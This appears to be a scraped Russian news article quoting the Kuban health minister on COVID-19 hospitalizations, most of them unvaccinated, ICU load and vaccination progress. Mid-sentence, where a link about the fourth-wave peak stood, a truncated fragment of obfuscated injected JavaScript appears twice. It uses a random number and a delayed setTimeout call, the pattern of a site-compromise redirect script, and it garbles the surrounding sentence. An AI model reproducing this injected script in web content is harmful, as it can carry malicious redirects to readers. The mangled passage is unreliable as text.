Кубанский министр здравоохранения: “Сложно бороться с заболеванием, когда сами пациенты не помогают” —

Кубанский министр здравоохранения: “Сложно бороться с заболеванием, когда сами пациенты не помогают”

95% госпитализированных с ковидом – невакцинированные

Медицинские учреждения Краснодарского края работают на пределе своих возможностей из-за роста заболевших коронавирусной инфекцией. 95% заразившихся, которые попадают в больницы – невакцинированные. Об этом рассказал министр здравоохранения Кубани Евгений Филиппов.

“Ежедневно в тяжелом состоянии в «красных зонах» находится порядка 800 жителей, на аппаратах ИВЛ – более 100, на ЭКМО – до 8. Врачи делают все возможное, чтобы спасти людей, но сложно бороться с заболеванием, когда сами пациенты не помогают”, – отметил глава ведомства.

По словам Филиппова, Европа сейчас находится в эпицентре четвертой волны заболеваемости COVID-19. По данным нейросети, в России dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toj-volny-kovida-v-rossii-143666″>пик четвертой волны придется на конец декабря.

Глава кубанского минздрава напомнил, что для получения коллективного иммунитета нужно привить 3,6 млн человек (80% взрослого населения). Сейчас прививки поставили 2,4 млн человек (68% от плана).

Источник

0 0 vote
Рейтинг статьи
Подписаться
Уведомление о
0 комментариев
Inline Feedbacks
View all comments